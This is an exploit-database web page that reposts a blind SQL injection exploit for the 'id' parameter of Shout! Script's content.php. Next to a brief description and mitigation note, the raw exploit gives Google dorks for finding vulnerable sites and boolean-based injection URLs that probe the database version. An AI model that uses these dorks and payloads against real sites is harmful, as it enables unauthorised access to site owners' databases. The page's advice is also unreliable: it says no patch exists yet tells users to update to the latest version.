Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Shout! (content.php) Blind Sql Injection Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
Shout! Script
by:
Zero Cold
5.5
CVSS
MEDIUM
Blind Sql Injection
89
CWE
Product Name: Shout! Script
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Shout! (content.php) Blind Sql Injection Vulnerability

This vulnerability allows an attacker to perform Blind Sql Injection on the Shout! Script. By modifying the 'id' parameter in the content.php URL, the attacker can execute arbitrary SQL queries and retrieve sensitive information from the database. The exploit examples provided demonstrate how to determine the version of the database server by leveraging the boolean-based blind SQL injection technique.

Mitigation:

To mitigate this vulnerability, the vendor should implement proper input validation and parameterization techniques to prevent SQL injection attacks. Users are advised to update to the latest version of the Shout! Script.
Source

Exploit-DB raw data:

Shout! (content.php) Blind Sql Injection Vulnerability
=======================================================

####################################################################
.:. Author         : Zero Cold [zero-cold@msn.com]

.:. Team           : Sec Attack Team

.:. Home           : www.sec-attack.com/vb

.:. Script         : Shout! Script

.:. Vendor         : http://www.mediashaker.com/index.php

.:. Bug Type       : Blind Sql Injection

.:. Dork           : [1] "Powered by Shout!"
                     [2] intitle:"Shout" inurl:"admindex.php"

####################################################################

===[ Exploit ]===

www.site.com/content.php?id=54+and+1=1       >>> True
www.site.com/content.php?id=54+and+1=2       >>> False


www.site.com/content.php?id=54+and substring(@@version,1,1)=4  >>> True
www.site.com/content.php?id=54+and substring(@@version,1,1)=5  >>> False



####################################################################

Greats T0: HackxBack & AtT4CKxT3rR0r1ST & SAD All My Friend & All Member Sec Attack